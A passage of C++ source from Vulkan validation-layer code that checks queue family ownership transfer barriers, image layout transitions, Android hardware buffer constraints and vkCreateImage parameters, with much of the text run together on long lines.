        if (TempIsReleaseOp<Barrier, true /* Assume IsTransfer*/>(pool, &barriers[b]) &&
            !IsSpecial(barriers[b].dstQueueFamilyIndex)) {
            barrier_sets.release.emplace(barriers[b]);
        } else if (IsAcquireOp<Barrier, true /*Assume IsTransfer */>(pool, &barriers[b]) &&
                   !IsSpecial(barriers[b].srcQueueFamilyIndex)) {
            barrier_sets.acquire.emplace(barriers[b]);
        }
    }
}
CoreChecks::RecordQFOTransferBarriers(GLOBAL_CB_NODE *cb_state, uint32_t barrier_count, const Barrier *barriers) { auto pool = GetCommandPoolNode(cb_state->createInfo.commandPool); auto &barrier_sets = GetQFOBarrierSets(cb_state, typename QFOTransferBarrier<Barrier>::Tag()); for (uint32_t b = 0; b < barrier_count; b++) { if (!IsTransferOp(&barriers[b])) continue; if (TempIsReleaseOp<Barrier, true /* Assume IsTransfer*/>(pool, &barriers[b]) && !IsSpecial(barriers[b].dstQueueFamilyIndex)) { barrier_sets.release.emplace(barriers[b]); } else if (IsAcquireOp<Barrier, true /*Assume IsTransfer */>(pool, &barriers[b]) && !IsSpecial(barriers[b].srcQueueFamilyIndex)) { barrier_sets.acquire.emplace(barriers[b]); } } } bool CoreChecks::ValidateBarriersQFOTransferUniqueness(const char *func_name, GLOBAL_CB_NODE *cb_state, uint32_t bufferBarrierCount, const VkBufferMemoryBarrier *pBufferMemBarriers, uint32_t imageMemBarrierCount, const VkImageMemoryBarrier *pImageMemBarriers) { bool skip = false; skip |= ValidateQFOTransferBarrierUniqueness(func_name, cb_state, bufferBarrierCount, pBufferMemBarriers); skip |= ValidateQFOTransferBarrierUniqueness(func_name, cb_state, imageMemBarrierCount, pImageMemBarriers); return skip; } void CoreChecks::RecordBarriersQFOTransfers(GLOBAL_CB_NODE *cb_state, uint32_t bufferBarrierCount, const VkBufferMemoryBarrier *pBufferMemBarriers, uint32_t imageMemBarrierCount, const VkImageMemoryBarrier *pImageMemBarriers) { RecordQFOTransferBarriers(cb_state, bufferBarrierCount, pBufferMemBarriers); RecordQFOTransferBarriers(cb_state, imageMemBarrierCount, pImageMemBarriers); } template <typename BarrierRecord, typename Scoreboard> bool CoreChecks::ValidateAndUpdateQFOScoreboard(const debug_report_data *report_data, const GLOBAL_CB_NODE *cb_state, const char *operation, const BarrierRecord &barrier, Scoreboard *scoreboard) { // Record to the scoreboard or report that we have a duplication bool skip = false; auto inserted = 
scoreboard->insert(std::make_pair(barrier, cb_state)); if (!inserted.second && inserted.first->second != cb_state) { // This is a duplication (but don't report duplicates from the same CB, as we do that at record time skip = log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_state->commandBuffer), BarrierRecord::ErrMsgDuplicateQFOInSubmit(), "%s: %s %s queue ownership of %s (%s), from srcQueueFamilyIndex %" PRIu32 " to dstQueueFamilyIndex %" PRIu32 " duplicates existing barrier submitted in this batch from command buffer %s.", "vkQueueSubmit()", BarrierRecord::BarrierName(), operation, BarrierRecord::HandleName(), report_data->FormatHandle(barrier.handle).c_str(), barrier.srcQueueFamilyIndex, barrier.dstQueueFamilyIndex, report_data->FormatHandle(inserted.first->second).c_str()); } return skip; } template <typename Barrier> bool CoreChecks::ValidateQueuedQFOTransferBarriers(GLOBAL_CB_NODE *cb_state, QFOTransferCBScoreboards<Barrier> *scoreboards) { using BarrierRecord = QFOTransferBarrier<Barrier>; using TypeTag = typename BarrierRecord::Tag; bool skip = false; const auto &cb_barriers = GetQFOBarrierSets(cb_state, TypeTag()); const GlobalQFOTransferBarrierMap<Barrier> &global_release_barriers = GetGlobalQFOReleaseBarrierMap(TypeTag()); const char *barrier_name = BarrierRecord::BarrierName(); const char *handle_name = BarrierRecord::HandleName(); // No release should have an extant duplicate (WARNING) for (const auto &release : cb_barriers.release) { // Check the global pending release barriers const auto set_it = global_release_barriers.find(release.handle); if (set_it != global_release_barriers.cend()) { const QFOTransferBarrierSet<Barrier> &set_for_handle = set_it->second; const auto found = set_for_handle.find(release); if (found != set_for_handle.cend()) { skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, 
HandleToUint64(cb_state->commandBuffer), BarrierRecord::ErrMsgDuplicateQFOSubmitted(), "%s: %s releasing queue ownership of %s (%s), from srcQueueFamilyIndex %" PRIu32 " to dstQueueFamilyIndex %" PRIu32 " duplicates existing barrier queued for execution, without intervening acquire operation.", "vkQueueSubmit()", barrier_name, handle_name, report_data->FormatHandle(found->handle).c_str(), found->srcQueueFamilyIndex, found->dstQueueFamilyIndex); } } skip |= ValidateAndUpdateQFOScoreboard(report_data, cb_state, "releasing", release, &scoreboards->release); } // Each acquire must have a matching release (ERROR) for (const auto &acquire : cb_barriers.acquire) { const auto set_it = global_release_barriers.find(acquire.handle); bool matching_release_found = false; if (set_it != global_release_barriers.cend()) { const QFOTransferBarrierSet<Barrier> &set_for_handle = set_it->second; matching_release_found = set_for_handle.find(acquire) != set_for_handle.cend(); } if (!matching_release_found) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_state->commandBuffer), BarrierRecord::ErrMsgMissingQFOReleaseInSubmit(), "%s: in submitted command buffer %s acquiring ownership of %s (%s), from srcQueueFamilyIndex %" PRIu32 " to dstQueueFamilyIndex %" PRIu32 " has no matching release barrier queued for execution.", "vkQueueSubmit()", barrier_name, handle_name, report_data->FormatHandle(acquire.handle).c_str(), acquire.srcQueueFamilyIndex, acquire.dstQueueFamilyIndex); } skip |= ValidateAndUpdateQFOScoreboard(report_data, cb_state, "acquiring", acquire, &scoreboards->acquire); } return skip; } bool CoreChecks::ValidateQueuedQFOTransfers(GLOBAL_CB_NODE *cb_state, QFOTransferCBScoreboards<VkImageMemoryBarrier> *qfo_image_scoreboards, QFOTransferCBScoreboards<VkBufferMemoryBarrier> *qfo_buffer_scoreboards) { bool skip = false; skip |= ValidateQueuedQFOTransferBarriers<VkImageMemoryBarrier>(cb_state, 
qfo_image_scoreboards); skip |= ValidateQueuedQFOTransferBarriers<VkBufferMemoryBarrier>(cb_state, qfo_buffer_scoreboards); return skip; } template <typename Barrier> void CoreChecks::RecordQueuedQFOTransferBarriers(GLOBAL_CB_NODE *cb_state) { using BarrierRecord = QFOTransferBarrier<Barrier>; using TypeTag = typename BarrierRecord::Tag; const auto &cb_barriers = GetQFOBarrierSets(cb_state, TypeTag()); GlobalQFOTransferBarrierMap<Barrier> &global_release_barriers = GetGlobalQFOReleaseBarrierMap(TypeTag()); // Add release barriers from this submit to the global map for (const auto &release : cb_barriers.release) { // the global barrier list is mapped by resource handle to allow cleanup on resource destruction // NOTE: We're using [] because creation of a Set is a needed side effect for new handles global_release_barriers[release.handle].insert(release); } // Erase acquired barriers from this submit from the global map -- essentially marking releases as consumed for (const auto &acquire : cb_barriers.acquire) { // NOTE: We're not using [] because we don't want to create entries for missing releases auto set_it = global_release_barriers.find(acquire.handle); if (set_it != global_release_barriers.end()) { QFOTransferBarrierSet<Barrier> &set_for_handle = set_it->second; set_for_handle.erase(acquire); if (set_for_handle.size() == 0) { // Clean up empty sets global_release_barriers.erase(set_it); } } } } void CoreChecks::RecordQueuedQFOTransfers(GLOBAL_CB_NODE *cb_state) { RecordQueuedQFOTransferBarriers<VkImageMemoryBarrier>(cb_state); RecordQueuedQFOTransferBarriers<VkBufferMemoryBarrier>(cb_state); } // Avoid making the template globally visible by exporting the one instance of it we need. 
void CoreChecks::EraseQFOImageRelaseBarriers(const VkImage &image) { EraseQFOReleaseBarriers<VkImageMemoryBarrier>(image); } void CoreChecks::TransitionImageLayouts(GLOBAL_CB_NODE *cb_state, uint32_t memBarrierCount, const VkImageMemoryBarrier *pImgMemBarriers) { for (uint32_t i = 0; i < memBarrierCount; ++i) { auto mem_barrier = &pImgMemBarriers[i]; if (!mem_barrier) continue; // For ownership transfers, the barrier is specified twice; as a release // operation on the yielding queue family, and as an acquire operation // on the acquiring queue family. This barrier may also include a layout // transition, which occurs 'between' the two operations. For validation // purposes it doesn't seem important which side performs the layout // transition, but it must not be performed twice. We'll arbitrarily // choose to perform it as part of the acquire operation. if (IsReleaseOp(cb_state, mem_barrier)) { continue; } VkImageCreateInfo *image_create_info = &(GetImageState(mem_barrier->image)->createInfo); uint32_t level_count = ResolveRemainingLevels(&mem_barrier->subresourceRange, image_create_info->mipLevels); uint32_t layer_count = ResolveRemainingLayers(&mem_barrier->subresourceRange, image_create_info->arrayLayers); // Special case for 3D images with VK_IMAGE_CREATE_2D_ARRAY_COMPATIBLE_BIT_KHR flag bit, where <extent.depth> and // <arrayLayers> can potentially alias. When recording layout for the entire image, pre-emptively record layouts // for all (potential) layer sub_resources. 
if ((0 != (image_create_info->flags & VK_IMAGE_CREATE_2D_ARRAY_COMPATIBLE_BIT_KHR)) && (mem_barrier->subresourceRange.baseArrayLayer == 0) && (layer_count == 1)) { layer_count = image_create_info->extent.depth; // Treat each depth slice as a layer subresource } // For multiplanar formats, IMAGE_ASPECT_COLOR is equivalent to adding the aspect of the individual planes VkImageAspectFlags aspect_mask = mem_barrier->subresourceRange.aspectMask; if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) { if (FormatIsMultiplane(image_create_info->format)) { if (aspect_mask & VK_IMAGE_ASPECT_COLOR_BIT) { aspect_mask &= ~VK_IMAGE_ASPECT_COLOR_BIT; aspect_mask |= (VK_IMAGE_ASPECT_PLANE_0_BIT | VK_IMAGE_ASPECT_PLANE_1_BIT); if (FormatPlaneCount(image_create_info->format) > 2) { aspect_mask |= VK_IMAGE_ASPECT_PLANE_2_BIT; } } } } for (uint32_t j = 0; j < level_count; j++) { uint32_t level = mem_barrier->subresourceRange.baseMipLevel + j; for (uint32_t k = 0; k < layer_count; k++) { uint32_t layer = mem_barrier->subresourceRange.baseArrayLayer + k; TransitionImageAspectLayout(cb_state, mem_barrier, level, layer, aspect_mask, VK_IMAGE_ASPECT_COLOR_BIT); TransitionImageAspectLayout(cb_state, mem_barrier, level, layer, aspect_mask, VK_IMAGE_ASPECT_DEPTH_BIT); TransitionImageAspectLayout(cb_state, mem_barrier, level, layer, aspect_mask, VK_IMAGE_ASPECT_STENCIL_BIT); TransitionImageAspectLayout(cb_state, mem_barrier, level, layer, aspect_mask, VK_IMAGE_ASPECT_METADATA_BIT); if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) { TransitionImageAspectLayout(cb_state, mem_barrier, level, layer, aspect_mask, VK_IMAGE_ASPECT_PLANE_0_BIT_KHR); TransitionImageAspectLayout(cb_state, mem_barrier, level, layer, aspect_mask, VK_IMAGE_ASPECT_PLANE_1_BIT_KHR); TransitionImageAspectLayout(cb_state, mem_barrier, level, layer, aspect_mask, VK_IMAGE_ASPECT_PLANE_2_BIT_KHR); } } } } } bool CoreChecks::VerifyImageLayout(GLOBAL_CB_NODE const *cb_node, IMAGE_STATE *image_state, 
VkImageSubresourceLayers subLayers, VkImageLayout explicit_layout, VkImageLayout optimal_layout, const char *caller, const char *layout_invalid_msg_code, const char *layout_mismatch_msg_code, bool *error) { const auto image = image_state->image; bool skip = false; for (uint32_t i = 0; i < subLayers.layerCount; ++i) { uint32_t layer = i + subLayers.baseArrayLayer; VkImageSubresource sub = {subLayers.aspectMask, subLayers.mipLevel, layer}; IMAGE_CMD_BUF_LAYOUT_NODE node; if (FindCmdBufLayout(cb_node, image, sub, node)) { if (node.layout != explicit_layout) { *error = true; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), layout_mismatch_msg_code, "%s: Cannot use image %s (layer=%u mip=%u) with specific layout %s that doesn't match the actual " "current layout %s.", caller, report_data->FormatHandle(image).c_str(), layer, subLayers.mipLevel, string_VkImageLayout(explicit_layout), string_VkImageLayout(node.layout)); } } } // If optimal_layout is not UNDEFINED, check that layout matches optimal for this case if ((VK_IMAGE_LAYOUT_UNDEFINED != optimal_layout) && (explicit_layout != optimal_layout)) { if (VK_IMAGE_LAYOUT_GENERAL == explicit_layout) { if (image_state->createInfo.tiling != VK_IMAGE_TILING_LINEAR) { // LAYOUT_GENERAL is allowed, but may not be performance optimal, flag as perf warning. 
skip |= log_msg(report_data, VK_DEBUG_REPORT_PERFORMANCE_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), kVUID_Core_DrawState_InvalidImageLayout, "%s: For optimal performance image %s layout should be %s instead of GENERAL.", caller, report_data->FormatHandle(image).c_str(), string_VkImageLayout(optimal_layout)); } } else if (GetDeviceExtensions()->vk_khr_shared_presentable_image) { if (image_state->shared_presentable) { if (VK_IMAGE_LAYOUT_SHARED_PRESENT_KHR != explicit_layout) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, layout_invalid_msg_code, "Layout for shared presentable image is %s but must be VK_IMAGE_LAYOUT_SHARED_PRESENT_KHR.", string_VkImageLayout(optimal_layout)); } } } else { *error = true; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), layout_invalid_msg_code, "%s: Layout for image %s is %s but can only be %s or VK_IMAGE_LAYOUT_GENERAL.", caller, report_data->FormatHandle(image).c_str(), string_VkImageLayout(explicit_layout), string_VkImageLayout(optimal_layout)); } } return skip; } void CoreChecks::TransitionFinalSubpassLayouts(GLOBAL_CB_NODE *pCB, const VkRenderPassBeginInfo *pRenderPassBegin, FRAMEBUFFER_STATE *framebuffer_state) { auto renderPass = GetRenderPassState(pRenderPassBegin->renderPass); if (!renderPass) return; const VkRenderPassCreateInfo2KHR *pRenderPassInfo = renderPass->createInfo.ptr(); if (framebuffer_state) { for (uint32_t i = 0; i < pRenderPassInfo->attachmentCount; ++i) { auto view_state = GetAttachmentImageViewState(framebuffer_state, i); if (view_state) { SetImageViewLayout(pCB, view_state, pRenderPassInfo->pAttachments[i].finalLayout); } } } } #ifdef VK_USE_PLATFORM_ANDROID_KHR // Android-specific validation that uses types defined only with VK_USE_PLATFORM_ANDROID_KHR // This could also move into a seperate 
core_validation_android.cpp file... ? // // AHB-specific validation within non-AHB APIs // bool CoreChecks::ValidateCreateImageANDROID(const debug_report_data *report_data, const VkImageCreateInfo *create_info) { bool skip = false; const VkExternalFormatANDROID *ext_fmt_android = lvl_find_in_chain<VkExternalFormatANDROID>(create_info->pNext); if (ext_fmt_android) { if (0 != ext_fmt_android->externalFormat) { if (VK_FORMAT_UNDEFINED != create_info->format) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-pNext-01974", "vkCreateImage(): VkImageCreateInfo struct has a chained VkExternalFormatANDROID struct with non-zero " "externalFormat, but the VkImageCreateInfo's format is not VK_FORMAT_UNDEFINED."); } if (0 != (VK_IMAGE_CREATE_MUTABLE_FORMAT_BIT & create_info->flags)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-pNext-02396", "vkCreateImage(): VkImageCreateInfo struct has a chained VkExternalFormatANDROID struct with " "non-zero externalFormat, but flags include VK_IMAGE_CREATE_MUTABLE_FORMAT_BIT."); } if (0 != (~VK_IMAGE_USAGE_SAMPLED_BIT & create_info->usage)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-pNext-02397", "vkCreateImage(): VkImageCreateInfo struct has a chained VkExternalFormatANDROID struct with " "non-zero externalFormat, but usage includes bits other than VK_IMAGE_USAGE_SAMPLED_BIT."); } if (VK_IMAGE_TILING_OPTIMAL != create_info->tiling) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-pNext-02398", "vkCreateImage(): VkImageCreateInfo struct has a chained VkExternalFormatANDROID struct with " "non-zero externalFormat, but layout is not VK_IMAGE_TILING_OPTIMAL."); } } auto ahb_formats = GetAHBExternalFormatsSet(); if ((0 
!= ext_fmt_android->externalFormat) && (0 == ahb_formats->count(ext_fmt_android->externalFormat))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkExternalFormatANDROID-externalFormat-01894", "vkCreateImage(): Chained VkExternalFormatANDROID struct contains a non-zero externalFormat which has " "not been previously retrieved by vkGetAndroidHardwareBufferPropertiesANDROID()."); } } if ((nullptr == ext_fmt_android) || (0 == ext_fmt_android->externalFormat)) { if (VK_FORMAT_UNDEFINED == create_info->format) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-pNext-01975", "vkCreateImage(): VkImageCreateInfo struct's format is VK_FORMAT_UNDEFINED, but either does not have a " "chained VkExternalFormatANDROID struct or the struct exists but has an externalFormat of 0."); } } const VkExternalMemoryImageCreateInfo *emici = lvl_find_in_chain<VkExternalMemoryImageCreateInfo>(create_info->pNext); if (emici && (emici->handleTypes & VK_EXTERNAL_MEMORY_HANDLE_TYPE_ANDROID_HARDWARE_BUFFER_BIT_ANDROID)) { if (create_info->imageType != VK_IMAGE_TYPE_2D) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-pNext-02393", "vkCreateImage(): VkImageCreateInfo struct with imageType %s has chained VkExternalMemoryImageCreateInfo " "struct with handleType VK_EXTERNAL_MEMORY_HANDLE_TYPE_ANDROID_HARDWARE_BUFFER_BIT_ANDROID.", string_VkImageType(create_info->imageType)); } if ((create_info->mipLevels != 1) && (create_info->mipLevels != FullMipChainLevels(create_info->extent))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-pNext-02394", "vkCreateImage(): VkImageCreateInfo struct with chained VkExternalMemoryImageCreateInfo struct of " "handleType 
VK_EXTERNAL_MEMORY_HANDLE_TYPE_ANDROID_HARDWARE_BUFFER_BIT_ANDROID " "specifies mipLevels = %" PRId32 " (full chain mipLevels are %" PRId32 ").", create_info->mipLevels, FullMipChainLevels(create_info->extent)); } } return skip; } void CoreChecks::RecordCreateImageANDROID(const VkImageCreateInfo *create_info, IMAGE_STATE *is_node) { const VkExternalMemoryImageCreateInfo *emici = lvl_find_in_chain<VkExternalMemoryImageCreateInfo>(create_info->pNext); if (emici && (emici->handleTypes & VK_EXTERNAL_MEMORY_HANDLE_TYPE_ANDROID_HARDWARE_BUFFER_BIT_ANDROID)) { is_node->imported_ahb = true; } const VkExternalFormatANDROID *ext_fmt_android = lvl_find_in_chain<VkExternalFormatANDROID>(create_info->pNext); if (ext_fmt_android && (0 != ext_fmt_android->externalFormat)) { is_node->has_ahb_format = true; is_node->ahb_format = ext_fmt_android->externalFormat; } } bool CoreChecks::ValidateCreateImageViewANDROID(const VkImageViewCreateInfo *create_info) { bool skip = false; IMAGE_STATE *image_state = GetImageState(create_info->image); if (image_state->has_ahb_format) { if (VK_FORMAT_UNDEFINED != create_info->format) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(create_info->image), "VUID-VkImageViewCreateInfo-image-02399", "vkCreateImageView(): VkImageViewCreateInfo struct has a chained VkExternalFormatANDROID struct, but " "format member is %s.", string_VkFormat(create_info->format)); } // Chain must include a compatible ycbcr conversion bool conv_found = false; uint64_t external_format = 0; const VkSamplerYcbcrConversionInfo *ycbcr_conv_info = lvl_find_in_chain<VkSamplerYcbcrConversionInfo>(create_info->pNext); if (ycbcr_conv_info != nullptr) { VkSamplerYcbcrConversion conv_handle = ycbcr_conv_info->conversion; auto fmap = GetYcbcrConversionFormatMap(); if (fmap->find(conv_handle) != fmap->end()) { conv_found = true; external_format = fmap->at(conv_handle); } } if ((!conv_found) || (external_format != 
image_state->ahb_format)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(create_info->image), "VUID-VkImageViewCreateInfo-image-02400", "vkCreateImageView(): VkImageViewCreateInfo struct has a chained VkExternalFormatANDROID struct, but " "without a chained VkSamplerYcbcrConversionInfo struct with the same external format."); } // Errors in create_info swizzles if ((create_info->components.r != VK_COMPONENT_SWIZZLE_IDENTITY) || (create_info->components.g != VK_COMPONENT_SWIZZLE_IDENTITY) || (create_info->components.b != VK_COMPONENT_SWIZZLE_IDENTITY) || (create_info->components.a != VK_COMPONENT_SWIZZLE_IDENTITY)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(create_info->image), "VUID-VkImageViewCreateInfo-image-02401", "vkCreateImageView(): VkImageViewCreateInfo struct has a chained VkExternalFormatANDROID struct, but " "includes one or more non-identity component swizzles."); } } return skip; } bool CoreChecks::ValidateGetImageSubresourceLayoutANDROID(const VkImage image) { bool skip = false; IMAGE_STATE *image_state = GetImageState(image); if (image_state->imported_ahb && (0 == image_state->GetBoundMemory().size())) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-vkGetImageSubresourceLayout-image-01895", "vkGetImageSubresourceLayout(): Attempt to query layout from an image created with " "VK_EXTERNAL_MEMORY_HANDLE_TYPE_ANDROID_HARDWARE_BUFFER_BIT_ANDROID handleType which has not yet been " "bound to memory."); } return skip; } #else bool CoreChecks::ValidateCreateImageANDROID(const debug_report_data *report_data, const VkImageCreateInfo *create_info) { return false; } void CoreChecks::RecordCreateImageANDROID(const VkImageCreateInfo *create_info, IMAGE_STATE *is_node) {} bool CoreChecks::ValidateCreateImageViewANDROID(const 
VkImageViewCreateInfo *create_info) { return false; } bool CoreChecks::ValidateGetImageSubresourceLayoutANDROID(const VkImage image) { return false; } #endif // VK_USE_PLATFORM_ANDROID_KHR bool CoreChecks::PreCallValidateCreateImage(VkDevice device, const VkImageCreateInfo *pCreateInfo, const VkAllocationCallbacks *pAllocator, VkImage *pImage) { bool skip = false; if (GetDeviceExtensions()->vk_android_external_memory_android_hardware_buffer) { skip |= ValidateCreateImageANDROID(report_data, pCreateInfo); } else { // These checks are omitted or replaced when Android HW Buffer extension is active if (pCreateInfo->format == VK_FORMAT_UNDEFINED) { return log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-format-00943", "vkCreateImage(): VkFormat for image must not be VK_FORMAT_UNDEFINED."); } } if ((pCreateInfo->flags & VK_IMAGE_CREATE_CUBE_COMPATIBLE_BIT) && (VK_IMAGE_TYPE_2D != pCreateInfo->imageType)) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-flags-00949", "vkCreateImage(): Image type must be VK_IMAGE_TYPE_2D when VK_IMAGE_CREATE_CUBE_COMPATIBLE_BIT flag bit is set"); } const VkPhysicalDeviceLimits *device_limits = &(GetPDProperties()->limits); VkImageUsageFlags attach_flags = VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT | VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT | VK_IMAGE_USAGE_TRANSIENT_ATTACHMENT_BIT | VK_IMAGE_USAGE_INPUT_ATTACHMENT_BIT; if ((pCreateInfo->usage & attach_flags) && (pCreateInfo->extent.width > device_limits->maxFramebufferWidth)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-usage-00964", "vkCreateImage(): Image usage flags include a frame buffer attachment bit and image width exceeds device " "maxFramebufferWidth."); } if ((pCreateInfo->usage & attach_flags) && (pCreateInfo->extent.height > 
device_limits->maxFramebufferHeight)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-usage-00965", "vkCreateImage(): Image usage flags include a frame buffer attachment bit and image height exceeds device " "maxFramebufferHeight"); } VkImageFormatProperties format_limits = {}; VkResult res = GetPDImageFormatProperties(pCreateInfo, &format_limits); if (res == VK_ERROR_FORMAT_NOT_SUPPORTED) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUIDUndefined, "vkCreateImage(): Format %s is not supported for this combination of parameters.", string_VkFormat(pCreateInfo->format)); } else { if (pCreateInfo->mipLevels > format_limits.maxMipLevels) { const char *format_string = string_VkFormat(pCreateInfo->format); skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-mipLevels-02255", "vkCreateImage(): Image mip levels=%d exceed image format maxMipLevels=%d for format %s.", pCreateInfo->mipLevels, format_limits.maxMipLevels, format_string); } uint64_t texel_count = (uint64_t)pCreateInfo->extent.width * (uint64_t)pCreateInfo->extent.height * (uint64_t)pCreateInfo->extent.depth * (uint64_t)pCreateInfo->arrayLayers * (uint64_t)pCreateInfo->samples; uint64_t total_size = (uint64_t)std::ceil(FormatTexelSize(pCreateInfo->format) * texel_count); // Round up to imageGranularity boundary VkDeviceSize imageGranularity = GetPDProperties()->limits.bufferImageGranularity; uint64_t ig_mask = imageGranularity - 1; total_size = (total_size + ig_mask) & ~ig_mask; if (total_size > format_limits.maxResourceSize) { skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, 0, kVUID_Core_Image_InvalidFormatLimitsViolation, "vkCreateImage(): resource size exceeds allowable maximum Image resource size = 0x%" PRIxLEAST64 ", maximum resource size = 
0x%" PRIxLEAST64 " ", total_size, format_limits.maxResourceSize); } if (pCreateInfo->arrayLayers > format_limits.maxArrayLayers) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, 0, "VUID-VkImageCreateInfo-arrayLayers-02256", "vkCreateImage(): arrayLayers=%d exceeds allowable maximum supported by format of %d.", pCreateInfo->arrayLayers, format_limits.maxArrayLayers); } if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion && FormatRequiresYcbcrConversion(pCreateInfo->format) && !GetDeviceExtensions()->vk_ext_ycbcr_image_arrays && pCreateInfo->arrayLayers > 1) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, 0, "VUID-VkImageCreateInfo-format-02653", "vkCreateImage(): arrayLayers=%d exceeds the maximum allowed of 1 for formats requiring sampler ycbcr conversion", pCreateInfo->arrayLayers); } if ((pCreateInfo->samples & format_limits.sampleCounts) == 0) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, 0, "VUID-VkImageCreateInfo-samples-02258", "vkCreateImage(): samples %s is not supported by format 0x%.8X.", string_VkSampleCountFlagBits(pCreateInfo->samples), format_limits.sampleCounts); } } if ((pCreateInfo->flags & VK_IMAGE_CREATE_SPARSE_ALIASED_BIT) && (!GetEnabledFeatures()->core.sparseResidencyAliased)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-flags-01924", "vkCreateImage(): the sparseResidencyAliased device feature is disabled: Images cannot be created with the " "VK_IMAGE_CREATE_SPARSE_ALIASED_BIT set."); } if (GetDeviceExtensions()->vk_khr_maintenance2) { if (pCreateInfo->flags & VK_IMAGE_CREATE_BLOCK_TEXEL_VIEW_COMPATIBLE_BIT_KHR) { if (!(FormatIsCompressed_BC(pCreateInfo->format) || FormatIsCompressed_ASTC_LDR(pCreateInfo->format) || FormatIsCompressed_ETC2_EAC(pCreateInfo->format))) { // TODO: Add Maintenance2 
